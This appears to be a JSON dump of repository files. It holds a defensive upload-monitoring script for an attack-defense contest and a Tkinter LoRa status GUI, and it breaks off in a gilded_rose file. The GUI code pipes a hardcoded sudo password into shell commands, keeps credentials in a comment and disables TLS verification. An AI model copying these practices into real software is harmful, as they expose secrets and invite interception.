[ { "alpha_fraction": 0.5772811770439148, "alphanum_fraction": 0.5791434049606323, "avg_line_length": 21.25, "blob_id": "39d156489bb98e301f014ee2a26e78d01c2571c8", "content_id": "f3a54adb7d9ee101b4f5508316ec3727dd665e85", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 537, "license_type": "no_license", "max_line_length": 78, "num_lines": 24, "path": "/rename.py", "repo_name": "kuangrp/upload", "src_encoding": "UTF-8", "text": "import os,time\ndisk = os.getcwd()\ndef wirte_txt():\n\tprint ('run')\n\tnum = [a+'/'+n for a,b,c in os.walk(disk) for n in c]\n\tprint (len(num))\n\t#with open(disk+'name.txt','a') as f:\n\t#\tfor i in num:\n\t#\t\tf.write(i+'\\n')\n\treturn num\ndef main(num):\n\tchuan = list(set([a+'/'+n for a,b,c in os.walk(disk) for n in c]) - set(num))\n\tif chuan:\n\t\tfor i in chuan:\n\t\t\tprint ('rename --'+i)\n\t\t\trena = i.replace('.','x')\n\t\t\tos.rename(i,rena)\n\t\t\tnum.append(rena)\n\telse:\n\t\tprint ('no updata!')\ntxt = wirte_txt()\nwhile True:\n\tmain(txt)\n\ttime.sleep(3)\n\n\n\n" }, { "alpha_fraction": 0.875, "alphanum_fraction": 0.875, "avg_line_length": 23, "blob_id": "5c751f6b444136587f19c4a4df0a15871ee662bd", "content_id": "68f1f5cb0b6555142e1f9a47b32ac7451d2f0843", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 126, "license_type": "no_license", "max_line_length": 24, "num_lines": 2, "path": "/README.md", "repo_name": "kuangrp/upload", "src_encoding": "UTF-8", "text": "# 主要用于AWD线下赛中监测对手的文件上传行为\n具体就是检测到上传文件后,将文件名的.替换掉\n" } ]
2
Sagarved/gui-tkinter-poprn-yml
https://github.com/Sagarved/gui-tkinter-poprn-yml
f742c79e0c867d37469fdf58e507f2ccf9a0b17e
dfc81363d687e0389cde6e568f8f42ebaf104c1c
6f74a6ca50125a097e10ab5ed83912fb404bf3eb
refs/heads/master
2023-08-13T13:54:09.856209
2021-10-05T23:21:33
2021-10-05T23:21:33
414,006,525
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6039286255836487, "alphanum_fraction": 0.6416115164756775, "avg_line_length": 35.40876007080078, "blob_id": "530ce13941dd5741ba60734fa8e6718ea492ba3f", "content_id": "39a43c9f9a2514fb3ac5b2237fbd49ffd9b0c3ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4989, "license_type": "no_license", "max_line_length": 157, "num_lines": 137, "path": "/center_gui.py", "repo_name": "Sagarved/gui-tkinter-poprn-yml", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n\nimport logging\nimport time\nfrom tkinter import *\n\nimport start_container as sc\nimport device_api as dev\n\nlogging.info('Welcome to LoRa In A Box')\nroot = Tk()\nroot.title(\"Welcome to LoRa In A Box\") \nroot.geometry(\"1920x1080\")\nroot.configure(background='black')\ncount_num = 0\n\nfont_creator = ('Helvetica', 25,'bold')\n#gridFrame = Frame(root, bg='black')\n\nstep_text = {\"step_1\": \"System Up\", \"step_2\": \"LNS Up\", \"step_3\": \"Dashboard\", \"step\": \"Device Connected\"}\n#Creating label for four steps\nstep_1 = Label(root, text=\"System Up\", bg='yellow', padx=10, pady=10, font=font_creator, height=3, relief= RAISED)\nstep_2 = Label(root, text=\"LNS Up\", bg='yellow', padx=10, pady=10, font=font_creator, height=3, relief= RAISED)\nstep_3 = Label(root, text=\"LoRa Dashboard\", bg='yellow', padx=10, font=font_creator, pady=10, height=3, relief= RAISED)\nstep_4 = Label(root, text=\"Devices Connected\", bg='yellow', padx=10, font=font_creator, pady=10, height=3, relief= RAISED)\n\n#Data flow Arrow\nwhite_image = PhotoImage(file='/home/wrdlab/white.gif')\ngreen_image = PhotoImage(file='/home/wrdlab/green.gif')\n#python_gif_image = PhotoImage(file='/home/wrdlab/gifarrow.gif')\nst12_label = Label(root, image=white_image)\nst23_label = Label(root, image=white_image)\nst34_label = Label(root, image=white_image)\n\n#Arrow positioning row=1\n#Even column\nst12_label.grid(row=1, column=2)\nst23_label.grid(row=1, column=4)\nst34_label.grid(row=1, column=6)\n\n#Vertical position of data stores in Row 1 and odd column\nstep_1.grid(row=1,column=1)\nstep_2.grid(row=1,column=3)\nstep_3.grid(row=1,column=5)\nstep_4.grid(row=1,column=7)\n\n#Central object placement using equal weight to row 1,2, and 3\nroot.rowconfigure(0,weight=1) \nroot.rowconfigure(1,weight=1) \nroot.rowconfigure(2,weight=1) \n\n#Central horizontal placement with the same weightage on all column\n#If new steps are added add in column space\nroot.columnconfigure(1,weight=2) \nroot.columnconfigure(3,weight=2) \nroot.columnconfigure(5,weight=2) \nroot.columnconfigure(7,weight=2)\n#Data flow image dynamic width\nroot.columnconfigure(2,weight=1) \nroot.columnconfigure(4,weight=1) \nroot.columnconfigure(6,weight=1) \n\n#color annotation\nready = Label(root, text=\"Ready\", bg='green', padx=25, pady=10).grid(row=9,column=0)\nprogress = Label(root, text=\"In Progress\", bg='#5f0fff',padx=10, pady= 10).grid(row=10,column=0)#light blue #5f0fff\npending = Label(root, text=\"Not_Ready\", bg='yellow', padx=10, pady=10).grid(row=11,column=0)\n\ndef status_check():\n global count_num\n check_dockers = sc.step_2()\n #print(check_dockers)\n if count_num <4:\n step_check=['3000', 'recovserver', 'starting','200'] # 3000 and starting for step1 and step2, third starting is actually healthy, 200 is api response\n step_list = [step_1,step_2,step_3,step_4]\n data_list = [st12_label,st23_label,st34_label]\n if step_check[count_num] in check_dockers and count_num < 2: \n print(step_check[count_num])\n #Change color and data flow image\n step_list[count_num].configure(bg='green')\n count_num += 1\n step_list[count_num].configure(bg='#5f0fff')\n if count_num > 1:\n data_list[count_num-2].configure(image=green_image)\n elif step_check[count_num] not in check_dockers and count_num==2:\n print(step_check[count_num])\n #Change color and data flow image\n step_list[count_num].configure(bg='green')\n count_num += 1\n step_list[count_num].configure(bg='#5f0fff')\n if count_num > 1:\n data_list[count_num-2].configure(image=green_image)\n elif count_num ==3:\n resp = dev.dev_api()\n #print(resp,devices)\n\n if '200' in str(resp):\n #Number of devices\n devices = resp[1]\n print(step_check[count_num])\n #Change color and data flow image\n step_list[count_num].configure(text= str(devices)+ ' Devices Connected',bg='green')\n count_num += 1\n if count_num > 1:\n data_list[count_num-2].configure(image=green_image)\n \n root.after(3000, status_check)\n \n \n \n\n\ndef ready_check():\n #check if system is ready with both container status Healthy\n check = False\n check = sc.step_2()\n print(check)\n if check:\n ready.configure(text= 'System Ready', bg='green', padx=20, pady=20)\n else:\n ready.configure(text='System not ready, wait for sometime')\n\n\"\"\"def basic():\n global count_num\n if count_num > 0:\n step_1.configure(bg='green')\n count_num = 0\n elif count_num == 0:\n step_1.configure(bg='red')\n count_num += 1 \n #After 2 second update status color\n root.after(2000, basic)\n\"\"\"\nif __name__==\"__main__\":\n #After 1 millisecond call basic\n\n root.after(1, status_check)\n root.mainloop()\n\n" }, { "alpha_fraction": 0.6957894563674927, "alphanum_fraction": 0.7052631378173828, "avg_line_length": 25.38888931274414, "blob_id": "f8bcb1388f3c4246911f1ee487683fec37a7dd86", "content_id": "ad601d4ff8368a2e261f9392f7bd473cce6cf671", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 950, "license_type": "no_license", "max_line_length": 89, "num_lines": 36, "path": "/device_api.py", "repo_name": "Sagarved/gui-tkinter-poprn-yml", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n\"\"\"\nQuery device api and return status code with number of devices \n\"\"\"\n\nimport json\nimport yaml\nimport requests\nfrom requests.packages import urllib3\nfrom requests.auth import HTTPBasicAuth\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n#Reading configuration\nfile = 'config.yml'\ndata = yaml.safe_load(open(file))\ndata_api = data['api']\n\nIP = data_api['IP']\nurl = 'https://'+ IP +':50001/rest/nodes/'\nuserid= data_api['userid']\npassword= data_api['password']\n\ndef dev_api():\n #resp= requests.get(url, auth =HTTPBasicAuth('device_api','Charter123'),verify=False)\n resp= requests.get(url, auth =HTTPBasicAuth(userid, password),verify=False)\n #Convert response to the list of dictionary\n info = resp.json()\n #length of output = Number of devices\n devices = (len(info))\n #print(type(info),info)\n return(resp.status_code, devices)\n\nif __name__=='__main__':\n out = dev_api()\n print(out)\n" }, { "alpha_fraction": 0.5216701626777649, "alphanum_fraction": 0.5454545617103577, "avg_line_length": 32.78571319580078, "blob_id": "046388841660eca1db7ddf972ed3d042af195879", "content_id": "e26cb52e182d25a41fe42474e1217b31aa93f430", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1892, "license_type": "no_license", "max_line_length": 97, "num_lines": 56, "path": "/start_container.py", "repo_name": "Sagarved/gui-tkinter-poprn-yml", "src_encoding": "UTF-8", "text": "import subprocess as sp\nimport time\n\ndef step_1():\n # Starting docker and VM services\n response=sp.run(\"echo 'Charter123'|sudo service docker restart\", shell=True)\n wait = True\n while(wait):\n if response:\n wait = response.returncode\n print('Inside wait',wait)\n else:\n print('Waiting 10 secs')\n time.sleep(10)\n time.sleep(65)\n # Tuple not able to perform 'in' operation so, typecasted to string\n dls = str(sp.getstatusoutput([\"echo 'Charter123'| sudo docker container ls\"]))\n if '3000/tcp' not in dls:\n print('Not all containers have started')\n print(type(dls),dls)\n step_1()\n print('Containers are running properly')\n \ndef step_1a():\n time.sleep(20)\n vm = sp.Popen(\"sudo ./install_startup_service_for_vm.sh\", shell=True)\n print('VM service')\n vm.wait()\n print(\"Completed step 1 and 1a\")\n\n\ndef step_2():\n all_container = False\n #check container and service\n services = sp.check_output([\"echo 'Charter123'|sudo docker service ls\"], shell=True)\n #container = sp.run([\"echo 'Charter123'| sudo docker container ls\"], shell=True)\n #Working solution\n #container = sp.check_output([\"echo 'Charter123'| sudo docker container ls\"], shell=True)\n container = str(sp.getstatusoutput([\"echo 'Charter123'| sudo docker container ls\"]))\n return container\n \"\"\"#GUI Readiness check\n if 'starting' in container:\n return False\n else:\n return True #print('Completed step 2')\n \"\"\"\n\nif __name__==\"__main__\":\n step_1()\n step_1a()\n i = 0\n while(i < 2):\n time.sleep(10)\n step_2()\n i += 1\n print('Done')\n" }, { "alpha_fraction": 0.7600896954536438, "alphanum_fraction": 0.7679372429847717, "avg_line_length": 45.05263137817383, "blob_id": "ee327421837c332fbb5b1d29e0b84dace8a8768b", "content_id": "5d43c1c325309afd778aa75a3b491136c9396d01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 892, "license_type": "no_license", "max_line_length": 120, "num_lines": 19, "path": "/README.txt", "repo_name": "Sagarved/gui-tkinter-poprn-yml", "src_encoding": "UTF-8", "text": "GUI README\r\nClone GUI repository and add to Home directory.\r\nstart_container file start and monitor container and dashboard process\r\ndevice_api file used for querying api request to find devices connected to dashboard.\r\ncenter_gui file is main file for rendering gui.\r\n\r\nconfig file comprises of dashboard url and credential for orbiwise portal\r\nSteps:\r\n1a) pip install -r requirement.txt\r\n1b) Update url, and credential in config.yml file\r\n1) start container on boot time.\r\n$ sudo vim ctontab -e\r\n-> Enter start_container script in cronjob \r\n@reboot python3 /home/wrdlab/GUI/start_container.py >> /home/wrdlab/GUI/sc.txt\r\n-> Save and close the file\r\n2) Start GUI on user Log In.\r\n-> On centos 7 use 'gnome-session-properties' to edit this in the GUI. Go to terminal and type $gnome-session-properties\r\n-> Add a center_gui script\r\n3) Reboot the system to check system GUI is coming properly." } ]
4
TrevorHeyl/PyProd
https://github.com/TrevorHeyl/PyProd
069b47ea8b415a37dd29281c6c78392eff8b8f80
a5f684ee5200ff366ba7aa2d89a1bfdddb47730d
d4c066d4ad7654d45470791bd3dda363810b81d2
refs/heads/master
2020-08-16T08:10:37.375224
2019-10-16T11:34:56
2019-10-16T11:34:56
215,478,278
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7368420958518982, "alphanum_fraction": 0.7368420958518982, "avg_line_length": 25.125, "blob_id": "ca874d385096e8b0749946e921d235128713646b", "content_id": "434097cca9d5a0d8ea32439bf914891bc7e3e949", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 209, "license_type": "permissive", "max_line_length": 62, "num_lines": 8, "path": "/README.md", "repo_name": "TrevorHeyl/PyProd", "src_encoding": "UTF-8", "text": "# PyProd\nPython utility to parse production logs and measure effeciency\n\nUses pandas to write the csv file\n\n**usage : >python parse.py -dYYYY/MM/DD**\n\nFiles of type CY******.txt must be in the current folder\n" }, { "alpha_fraction": 0.558795154094696, "alphanum_fraction": 0.574698805809021, "avg_line_length": 36.387386322021484, "blob_id": "220c196999f5ac103bdb77da9b94c93efbd601a7", "content_id": "00962cd04dc357ad3281ab3069f693de7cf6ca7d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4150, "license_type": "permissive", "max_line_length": 118, "num_lines": 111, "path": "/parse.py", "repo_name": "TrevorHeyl/PyProd", "src_encoding": "UTF-8", "text": "# Utility to process production logs.\n# Counts number of passes and failures and also\n# the total test time for each unit and for the batch based on the date\n# that is passed to the command line in format YYYY/MM/DD\n# The code is a demonstrator in that it can be modified to process any type of production log that\n# consists of text files that need to be read and parsed\n\nimport sys\nimport os\nimport pandas as pd\n\n\ntestdate = \"\"\nunitcount = 0\nalltesttime = 0\nalltestcount = 0\nallfailcount = 0\nallpasscount = 0\npasstesttime = 0\nfailtesttime = 0\nallpasstesttime = 0\nallfailtesttime = 0\n#print(sys.argv)\n\n#get the date parameter\nfor l in sys.argv:\n if '-d' in l:\n testdate = l[2:]\n\nif testdate == \"\":\n print(\"Please specify a date parameter eg >parse -d2019/10/15\")\n exit(0)\n\n\nprint(\"Test Date:\",testdate)\n# Column names\nlabels = [\"SERIAL\",\"FAIL\",\"PASS\",\"TOTALTESTS\",\"TOTALTIME\"]\ndf = pd.DataFrame(columns=labels)\n\n# for each file in the current directory ....\nfor filename in os.listdir(os.getcwd()):\n # only CY...txt files\n if \"txt\" in filename and filename[:2] == \"CY\":\n file = open(filename,'r')\n #print(filename[:-4], end=' ')\n\n lines = file.readlines()\n failcount = 0;\n passcount = 0;\n passtesttime = 0\n failtesttime = 0\n ldate = \"\"\n ltime = \"\"\n TotalTestTime = 0\n unitcount = unitcount + 1\n for i in range(0, len(lines)):\n l = lines[i]\n if \"FAIL FAIL FAIL\" in l:\n ltime = lines[i+2]\n ldate = lines[i+5]\n i = i+5\n if \"Terminal Debug Version\" in ldate:\n s = ldate.split(' ')\n if s[6] == testdate:\n #print(s[6])\n if \"Test Time\" in ltime:\n s = ltime.split(' ')\n #print(\"FAIL:\",s[4])\n TotalTestTime = TotalTestTime + int(s[4])\n failcount = failcount + 1;\n failtesttime = failtesttime + int(s[4])\n\n\n if \"PASS PASS PASS\" in l:\n ltime = lines[i+2]\n ldate = lines[i+5]\n i = i+5\n if \"Terminal Debug Version\" in ldate:\n s = ldate.split(' ')\n if s[6] == testdate:\n #print(s[6])\n if \"Test Time\" in ltime:\n s = ltime.split(' ')\n #print(\"PASS:\",s[4])\n TotalTestTime = TotalTestTime + int(s[4])\n passcount = passcount + 1;\n passtesttime = passtesttime + int(s[4])\n alltesttime = alltesttime + TotalTestTime\n alltestcount = alltestcount + passcount+failcount\n allpasscount = allpasscount + passcount\n allfailcount = allfailcount + failcount\n allpasstesttime = allpasstesttime + passtesttime\n allfailtesttime = allfailtesttime + failtesttime\n #print(\",\",failcount,\",\",passcount,\",\",passcount+failcount,\",\",TotalTestTime)\n #print(\"{:s},{:d},{:d},{:d},{:d}\".format(filename[:-4],failcount,passcount,passcount+failcount,TotalTestTime))\n df.loc[len(df)] = [filename[:-4],failcount,passcount,passcount+failcount,TotalTestTime]\n\nprint(\"Total Units Tested \",unitcount)\nprint(\"Total Tests performed \",alltestcount)\nprint(\"Total Passes \",allpasscount)\nprint(\"Total Fails \",unitcount - allpasscount)\nprint(\"Total Test Time \",alltesttime)\nprint(\"Average test time {:0.2f}s \".format(alltesttime/(alltestcount)))\nprint(\"Average test time passed units {:0.2f}s \".format(allpasstesttime/(allpasscount)))\nprint(\"Average test time failed units {:0.2f}s \".format(allfailtesttime/(allfailcount)))\nprint(\"Percent passed units {:2.1f}% \".format(100*allpasscount/(unitcount) ))\nprint(\"Testing Efficiency {:2.1f}%\".format(100*allpasstesttime/(alltesttime)))\nprint(\"Real average test time per unit {:0.2f}\".format(alltesttime/unitcount) )\n\nsavefilename = \"Stats\" + testdate.replace('/','_') + \".csv\"\ndf.to_csv(savefilename)\n" } ]
2
lakshmanraob/PythonDataScience
https://github.com/lakshmanraob/PythonDataScience
8c125d8d4c6be0354622aafc0970fc42659b557f
8fa7947ec1b0febecbebcf5c47c18c614dfaf35c
46673151c2c16fd8f70313682336419bc1c9fc96
refs/heads/master
2021-01-20T14:59:43.833984
2018-12-22T01:53:02
2018-12-22T01:53:02
90,701,932
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7322404384613037, "alphanum_fraction": 0.7404371500015259, "avg_line_length": 25.14285659790039, "blob_id": "2f15f366f9c80e79726d5378f0d9203a998afc96", "content_id": "9359f68056ceae1c1cdcc78bf68f5554be8b8ae5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 732, "license_type": "no_license", "max_line_length": 88, "num_lines": 28, "path": "/DSExp/Classifier.py", "repo_name": "lakshmanraob/PythonDataScience", "src_encoding": "UTF-8", "text": "from sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.datasets import load_iris\nfrom sklearn.model_selection import train_test_split\nimport sklearn.metrics as metrics\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\niris = load_iris()\n\nX = iris.data\ny = iris.target\nscore = []\n\n# get target_names and display for the prediction\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=4)\n\nnarray = np.arange(1, 26)\nfor n in narray:\n knn = KNeighborsClassifier(n_neighbors=n)\n knn.fit(X_train, y_train)\n y_predict = knn.predict(X_test)\n score.append(metrics.accuracy_score(y_test, y_predict))\n\nplt.plot(narray, score)\nplt.xlabel(\"Value of K\")\nplt.ylabel(\"prediction accuracy\")\n" }, { "alpha_fraction": 0.7551299333572388, "alphanum_fraction": 0.7667578458786011, "avg_line_length": 25.581817626953125, "blob_id": "fef1bdd5f9da3e8cb39346636c7b6eaa285d0607", "content_id": "9d1dcf1801745de517a9539ce3c0cfead68711a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1462, "license_type": "no_license", "max_line_length": 116, "num_lines": 55, "path": "/HousingPrices/house_predict_rfr.py", "repo_name": "lakshmanraob/PythonDataScience", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 19 14:08:39 2018\n\n@author: labattula\n\"\"\"\n\n\"\"\"\nImporting neccessary libraries\n\"\"\"\n\"\"\"\n RandomForestRegressor choosen to incluse many shallow trees and compare the results\n and give the predicted value\n\"\"\"\nfrom sklearn.ensemble import RandomForestRegressor\n\"\"\"\nused train_test_split method to split data to train and build the model and predict the \noutcome basing and compare the same with the actual value \n\"\"\"\nfrom sklearn.model_selection import train_test_split\n\"\"\"\nmean_absolute_error will be used for comaring the predicted value with the absolute value.\nIn lay man terms, it is a comparision of one technique of measurement versus an alternative technique of measurement\n\"\"\"\nfrom sklearn.metrics import mean_absolute_error\n\nimport pandas as pd\n\nmelborne_file_path = '/Users/labattula/Documents/lakshman/ML/PythonDataScience/HousingPrices/melb_data.csv'\n\nmelbourne_data = pd.read_csv(melborne_file_path)\n\nmelbourne_columns = melbourne_data.columns\n\nmelbourne_data = melbourne_data.dropna(axis=0)\n\ny = melbourne_data.Price\n\nprint(melbourne_data.columns)\nfeatures = ['Rooms','Bathroom','Landsize','Lattitude','Longtitude']\n\nX = melbourne_data[features]\n\ntrain_X,val_X,train_y,val_y = train_test_split(X,y,random_state=1)\n\nmodel = RandomForestRegressor(random_state=1)\n\nmodel.fit(train_X,train_y)\n\nval_predict = model.predict(val_X)\n\nmae = mean_absolute_error(val_y,val_predict)\n\nprint(mae)\n" }, { "alpha_fraction": 0.6591151356697083, "alphanum_fraction": 0.6663113236427307, "avg_line_length": 38.03125, "blob_id": "ccf5ae4da1a7f0fc61cca915788652ab97457311", "content_id": "81fb03991f626ff77e101833a894cc9a392cb3b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3752, "license_type": "no_license", "max_line_length": 108, "num_lines": 96, "path": "/HousingPrices/imputation.py", "repo_name": "lakshmanraob/PythonDataScience", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 20 11:47:29 2018\n\n@author: labattula\n\"\"\"\n\n# creating the Imputation\n\nimport pandas as pd\nfrom sklearn.preprocessing import Imputer\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.model_selection import train_test_split\n\nmelbourne_file_path = \"/Users/labattula/Documents/lakshman/ML/PythonDataScience/HousingPrices/melb_data.csv\"\nmelbourne_data = pd.read_csv(melbourne_file_path)\n\n#print(melbourne_data.head())\n\n# price data taken in seperate data frame, this will be our target value\nmlb_data_price = melbourne_data.Price\n#taking the rest of the values except price\nmlb_price_predictors = melbourne_data.drop(['Price'],axis=1)\n\n#selecting only the numerice data for applying the imputation\nmlb_numeric_data_frame = mlb_price_predictors.select_dtypes(exclude=['object'])\n\nX_train,X_test,y_train,y_test = train_test_split(mlb_numeric_data_frame,\n mlb_data_price,\n train_size=0.7,\n test_size=0.3,\n random_state=1)\n\n\n# for getting mean absolute error basing on the RainForestRegressor \ndef score_dataset(X_train,X_test,y_train,y_test):\n model = RandomForestRegressor()\n model.fit(X_train,y_train)\n preds = model.predict(X_test)\n return mean_absolute_error(y_test,preds)\n\n########################################################\n# getting the columns which contains nan in their cells\ncols_for_drop = [col for col in X_train.columns\n if X_train[col].isnull().any()]\n\nreduced_X_train = X_train.drop(cols_for_drop,axis=1)\nreduced_X_test = X_test.drop(cols_for_drop,axis=1)\n\nprint(\"1. droping the columns with value as nan\")\nprint(score_dataset(reduced_X_train,reduced_X_test,y_train,y_test))\n\n########################################################\n# initializing the Imputer\nmy_imputer = Imputer()\n\n# this will replace the nan value with X_train average value\n# need to recast the ndArray back to Pandas dataFrame\n# the ndArrays will not be structured like Pandas DataFrame\n#imputed_X_train = my_imputer.fit_transform(X_train)\nimputed_X_train = pd.DataFrame(my_imputer.fit_transform(X_train))\nimputed_X_test = pd.DataFrame(my_imputer.transform(X_test))\n\nprint(\"2. Appying the imputation on the X_train and X_test\")\nprint(score_dataset(imputed_X_train,imputed_X_test,y_train,y_test))\n\n########################################################\n# process of notifying to the mode that these values are missing, so that the\n# model can take the right predictions\nprint(\"Extension to the imputation\")\nimputed_X_train_plus = X_train.copy()\nimputed_X_test_plus = X_test.copy()\n\n# getting the columns which hold nan in their cells\ncols_with_na_for_imputation = [col for col in X_train.columns\n if X_train[col].isnull().any()]\n\nfor col in cols_with_na_for_imputation:\n imputed_X_train_plus[col+\"_was_missing\"] = imputed_X_train_plus[col].isnull()\n imputed_X_test_plus[col+\"_was_missing\"] = imputed_X_test_plus[col].isnull()\n \next_imputer = Imputer()\n\n# this will impute the data\nimputed_X_train_plus = pd.DataFrame(ext_imputer.fit_transform(imputed_X_train_plus))\nimputed_X_test_plus = pd.DataFrame(ext_imputer.fit_transform(imputed_X_test_plus))\n\nprint(\"3. Applying the col missing valraible to the data\")\nprint(score_dataset(imputed_X_train_plus,imputed_X_test_plus,y_train,y_test))\n\n\"\"\"\nIt is observed that over the period of time, if keep running the above program, the \neffeieciency of the result is flutuating between approach 2 and 3\n\"\"\"\n\n\n\n\n\n" }, { "alpha_fraction": 0.7016072869300842, "alphanum_fraction": 0.7190775871276855, "avg_line_length": 28.224489212036133, "blob_id": "7bc4d2bfb31a30a4e80ffa94274514a797d50334", "content_id": "3e8f067d5c15aed8013c70b4e68ac5305b10bd29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1431, "license_type": "no_license", "max_line_length": 107, "num_lines": 49, "path": "/HousingPrices/house_predict_DTR.py", "repo_name": "lakshmanraob/PythonDataScience", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.model_selection import train_test_split\n\nimport pandas as pd\n\nmelboune_file_path = '/Users/labattula/Documents/lakshman/ML/PythonDataScience/HousingPrices/melb_data.csv'\nmelbourne_data = pd.read_csv(melboune_file_path)\n\nmelbourne_columns = melbourne_data.columns\n\nmelbourne_data = melbourne_data.dropna(axis=0)\n\ny = melbourne_data.Price\n\nprint(melbourne_data.columns)\nfeatures = ['Rooms','Bathroom','Landsize','Lattitude','Longtitude']\n\nX = melbourne_data[features]\n\ndef get_train_data(random_state):\n train_X,val_X,train_y,val_y = train_test_split(X,y,random_state=random_state)\n return train_X,val_X,train_y,val_y\n\nmax_leaf_nodes = [5,10,25,50,100,1000,2000,5000]\n\ndef get_mae(max_leaf):\n random_state = 1\n model = DecisionTreeRegressor(max_leaf_nodes = max_leaf,random_state=random_state)\n train_X,val_X,train_y,val_y = train_test_split(X,y,random_state=random_state)\n model.fit(train_X,train_y)\n val_predict = model.predict(val_X)\n mae = mean_absolute_error(val_y,val_predict)\n return (mae)\n\nd = []\nfor leaf_node in max_leaf_nodes:\n cal_mae = get_mae(leaf_node)\n d.append((leaf_node,cal_mae))\ndf = pd.DataFrame(d,columns=('leaf_node','mae'))\nmae_min = df.min().mae\nprint(df.loc[df['mae'] == df.min().mae])" }, { "alpha_fraction": 0.7254335284233093, "alphanum_fraction": 0.7312138676643372, "avg_line_length": 25.615385055541992, "blob_id": "e035addca1ef8af08e4e6d9a55988a1a5f88425d", "content_id": "ef0ad43616abebe07cfc08fc99f036e4ef496ee8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 346, "license_type": "no_license", "max_line_length": 93, "num_lines": 13, "path": "/DSExp/startds.py", "repo_name": "lakshmanraob/PythonDataScience", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\n\nfrom pandas import Series, DataFrame\n\nfile = '/Users/labattula/Documents/Lakshman/Future-ML/MyDS/matches.csv'\n\nDF_matches = pd.read_csv(file)\n# print DF_matches.head()\n\nteam_name = \"Royal Challengers Bangalore\"\n\nprint DF_matches.loc[(DF_matches['team1'] == team_name) | (DF_matches['team2'] == team_name)]\n" }, { "alpha_fraction": 0.7648026347160339, "alphanum_fraction": 0.7680920958518982, "avg_line_length": 20.714284896850586, "blob_id": "8ac0fb2f1e2320c2b761b0f7948245ecba70de68", "content_id": "06fe8a5906601695b41b801584c5cfb4fea3e6fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 608, "license_type": "no_license", "max_line_length": 72, "num_lines": 28, "path": "/DSExp/trainTestSplit.py", "repo_name": "lakshmanraob/PythonDataScience", "src_encoding": "UTF-8", "text": "from sklearn.cross_validation import train_test_split\n\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import LogisticRegression\n\nfrom sklearn.datasets import load_iris\n\nimport sklearn.metrics as metrics\n\niris = load_iris()\n\nX = iris.data\ny = iris.target\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4)\n\nprint X_train.shape\nprint X_test.shape\n\nprint y_train.shape\nprint y_test.shape\n\nlogReg = LogisticRegression()\nlogReg.fit(X_train, y_train)\n\ny_log_pred = logReg.predict(X_test)\n\nprint \"logistic approach..\", metrics.accuracy_score(y_test, y_log_pred)\n" } ]
6
claumartin/gilded_rose
https://github.com/claumartin/gilded_rose
09f2b6164a19314bb879b50c4aebb22a37d3f8e9
9a6e6ca2c823558cd634a8ee9e25970f0e95304d
1ba117ff3369cbbb382a2883696ba55080c7838d
refs/heads/master
2020-06-28T01:53:47.120418
2019-08-01T20:16:23
2019-08-01T20:16:23
200,111,904
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5837838053703308, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 13.269230842590332, "blob_id": "a0925e66e2496730b0a5a39f77fd39f9f2fb1d3a", "content_id": "c79d51b599e53dfb7f8decca5d3a3f2a07ba9fb4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 370, "license_type": "no_license", "max_line_length": 35, "num_lines": 26, "path": "/sulfuras.py", "repo_name": "claumartin/gilded_rose", "src_encoding": "UTF-8", "text": "from regularItem import RegularItem\n\n\nclass Sulfuras(RegularItem):\n\n def setSellIn(self):\n pass\n\n\n def updateQuality(self):\n pass\n\n\n\n\nif __name__ == '__main__':\n\n pato = Sulfuras('pato', 0, 80)\n\n assert pato.getName() == 'pato'\n\n pato.setSellIn()\n assert pato.getSellIn() == 0\n\n pato.updateQuality() \n assert pato.getQuality() == 80" }, { "alpha_fraction": 0.5922746658325195, "alphanum_fraction": 0.6151645183563232, "avg_line_length": 19.58823585510254, "blob_id": "b1c40cf1b7a71df4fa53b149f0420ef86d18596b", "content_id": "a5c12cd8ce571277ce5f7866810b3d2732716819", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 699, "license_type": "no_license", "max_line_length": 101, "num_lines": 34, "path": "/gildedRose.py", "repo_name": "claumartin/gilded_rose", "src_encoding": "UTF-8", "text": "from 